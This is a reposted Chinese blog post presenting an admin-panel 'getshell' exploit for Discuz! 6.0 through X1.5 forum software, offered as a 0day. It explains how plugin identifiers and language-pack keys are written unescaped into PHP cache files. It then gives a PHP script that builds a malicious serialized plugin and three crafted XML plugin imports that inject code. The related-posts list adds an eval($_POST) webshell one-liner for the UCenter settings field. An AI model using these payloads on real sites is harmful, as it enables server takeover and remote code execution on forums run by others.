discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来

最新推荐文章于 2021-12-21 14:33:43 发布
最新推荐文章于 2021-12-21 14:33:43 发布
阅读量2.4k 收藏
点赞数
分类专栏: Hacking 文章标签: datatables encoding shell plugins 数据库 联想
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6263490
版权

discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~


附上 
从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。
一 Discuz! 6.0 和 Discuz! 7.0
既然要后台拿Shell,文件写入必看。
/include/cache.func.php

往上翻,找到调用函数的地方.都在updatecache函数中.

如果我们可以控制$plugin['identifier']就有机会,它是plugins表里读出来的.
去后台看看,你可以发现identifier对应的是唯一标示符.联想下二次注射,单引号从数据库读出后写入文件时不会被转义.贱笑一下.
但是……你懂的,当你去野区单抓对面DPS时,发现对面蹲了4个敌人的心情.
/admin/plugins.inc.php

还好Discuz!提供了导入的功能,好比你有隐身,对面没粉.你有疾风步,对面没控.好歹给咱留条活路.

随便新建一个插件,identifier为shell,生成文件路径及内容.然后导出备用.
/forumdata/cache/plugin_shell.php

我们可以输入任意数据,唯一要注意的是文件名的合法性.感谢微软,下面的文件名是合法的.
/forumdata/cache/plugin_a']=phpinfo();$a['a.php

最后是编码一次,给成Exp:
<?php
$a = unserialize(base64_decode ("YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIw
IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldHNo
ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjU6IlNoZWxsIjtzOjExOiJkZXNj
cmlwdGlvbiI7czowOiIiO3M6MTA6ImRhdGF0YWJsZXMiO3M6MDoiIjtzOjk6
ImRpcmVjdG9yeSI7czowOiIiO3M6OToiY29weXJpZ2h0IjtzOjA6IiI7czo3
OiJtb2R1bGVzIjtzOjA6IiI7fXM6NzoidmVyc2lvbiI7czo1OiI2LjAuMCI7
fQ=="));
//print_r($a);
$a['plugin']['name']='GetShell';
$a['plugin']['identifier']='a/']=phpinfo();$a[/'';
print(base64_encode(serialize($a)));
?>

7.0同理,大家可以自己去测试咯.如果你使用上面的代码,请勾选"允许导入不同版本 Discuz! 的插件"

二 Discuz! 7.2 和 Discuz! X1.5
以下以7.2为例
/admin/plugins.inc.php

先看导入数据的过程,Discuz! 7.2之后的导入数据使用XML,但是7.2保持了向下兼容.X1.5废弃了.

判定了identifier之后,7.0版本之前的漏洞就不存在了.但是它又加入了语言包……
我们只要控制scriptlangstr或者其它任何一个就可以了。

Key这里不通用.
7.2

X1.5

还是看下shell.lang.php的文件格式.

7.2版本没有过滤Key,所以直接用/废掉单引号.
X1.5,单引号转义后变为/',再被替换一次',还是留下了/
而$v在两个版本中过滤相同,比较通用.
X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问/admin.php?frames=yes&action=plugins添加插件
$v通用Exp:

<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board (]%3E%3C/item]http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item > 
          <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a"><![CDATA[b/]]></item> 
                                  <itemid=");phpinfo();?>"><![CDATA[x]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

7.2 Key利用
  
<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board (]%3E%3C/item]http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item > 
          <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a/"><![CDATA[=>1);phpinfo();?>]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

X1.5

<?xmlversion="1.0"encoding="ISO-8859-1"?>

  <root> 
          <itemid="Title"><![CDATA[Discuz! Plugin]]></item> 
          <itemid="Version"><![CDATA[7.2]]></item> 
          <itemid="Time"><![CDATA[2011-03-16 15:57]]></item> 
          <itemid="From"><![CDATA[Discuz! Board 
         (</item">http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item> 
         <itemid="Data"> 
                  <itemid="plugin"> 
                          <itemid="available"><![CDATA[0]]></item> 
                          <itemid="adminid"><![CDATA[0]]></item> 
                          <itemid="name"><![CDATA[www]]></item> 
                          <itemid="identifier"><![CDATA[shell]]></item> 
                          <itemid="description"><![CDATA[]]></item> 
                          <itemid="datatables"><![CDATA[]]></item> 
                          <itemid="directory"><![CDATA[]]></item> 
                          <itemid="copyright"><![CDATA[]]></item> 
                          <itemid="modules"><![CDATA[a:0:{}]]></item> 
                          <itemid="version"><![CDATA[]]></item> 
                  </item> 
                  <itemid="version"><![CDATA[7.2]]></item> 
                  <itemid="language"> 
                          <itemid="scriptlang"> 
                                  <itemid="a'"><![CDATA[=>1);phpinfo();?>]]></item> 
                          </item> 
                  </item> 
          </item> 
  </root>

如果你愿意,可以使用base64_encode(serialize($a))的方法试试7.2获取Webshell.

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
7.2 discuzshell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...
weixin_39748928的博客
12-22 342
我网站 最近老被入侵就在网上 查了查 不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径然后直接getshelluserapp.php?script=notice&view=all&option=deluserapp&action=invite&am...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
7.2 discuzshell_Discuz 7.2FAQ-GETshell
weixin_42608299的博客
02-15 505
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author sbimport sysimport hashlibimport timeimport mathimport base64import urllib2import urllibimport redef s...
Discuz! X1.5 getshell 0day
weixin_33858485的博客
06-27 575
Discuz! X1.5 getshell 0day 利用代码如下 <?php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notify_credit.php Blind SQL injectio...
Dz7.2 从获取uc key到getshell
weixin_30256901的博客
01-23 357
0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0x02获取uc key exp: faq.php?action=grouppermission&gids[99]='&amp...
gentlexue#POC-3#Discuz 3.4 最新后台getshell1
07-25
Discuz 3.4 最新后台getshell详情可以看这篇文章:
QQ互联插件 for Discuz! X1.5-其他
06-13
<p>QQ互联插件针对Discuz! x1.5和7.2开发,允许使用Discuz X2中内置的QQ互联功能。</p><p>QQ互联插件 for Discuz! X1.5,整合QQ互联最核心的QQ帐号登录功能和看帖分享功能,并且安装非常简单。</p>
discuz X1.5 论坛后台站长常用操作小结
09-28
些算是论坛管理员比较常用的设置,具体详细设置还得自己看后台所显示的详细说明,都说得很明白,discuz后台相关设置是说不完的,每个人的需要不同设置也不同,很多还是得靠管理员自己
Discuz! X3.3 正式 简体中文 GBK 20170701
12-30
Discuz! X3.3 在继承和完善 Discuz! X3.2 的基础上,针对 PHP7 进行了优化。对于 X3.2 用户来说,X3.3 已继承了 X3.2 的补丁修复工作。安全稳定的程序为提供更加可靠的保障。
Discuz!6.0后台shell
weixin_34348174的博客
12-08 195
我记得以前看过这个资料,千翻万找总算翻了出来。   这个前提是可以编辑模板,不然我估计是没什么希望了。   templates/default/actions.lang.php(以这个为例)   在最底那提交   游客\');?>      \'g\'=>\'sdfsdf   便能写入一句话***并正常执行. 转载于:h...
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
discuz2.0 0day
02-26
discuz2.0 0day
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
dz7.0-7.2后台shell
weixin_34223655的博客
11-16 339
来源:网络 dz后台-全局-ucenter ip地址插入: 3EST\\’);eval($_POST[a])?>;// 保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功! 以上我在dz7.0-dz.7.2最新官方下载本测试通过。 本文转sinojelly51CT...
Discuz 7.0-7.2后台攻取webShell方法
huike008的博客
07-14 119
1. Ucenter插入一句话:3EST\\’);eval($_POST[a])?>;// 2. 然后返回刚才插入地方,随便替换几个字母 3.连接文件是根目录下的 config.inc.php http://www.xxx.com/config.inc.php成功插入 webshell discuz! 7.0 及以下后台拿webshell ...
7.2 discuzshell_Discuz! 7.2 SQL注入exp(getshell
weixin_39616686的博客
12-22 467
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。...
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1088
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
第三章 Discuz后台功能.docx
最新发布
04-22
Discuz后台的前台管理功能中,主题和帖子管理是其中的重要模块之一。这一功能可以帮助管理员对论坛中的主题和帖子进行全面的管理和维护,确保论坛的内容质量和运行效率。具体包括删除主题、主题置顶、设置精华、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值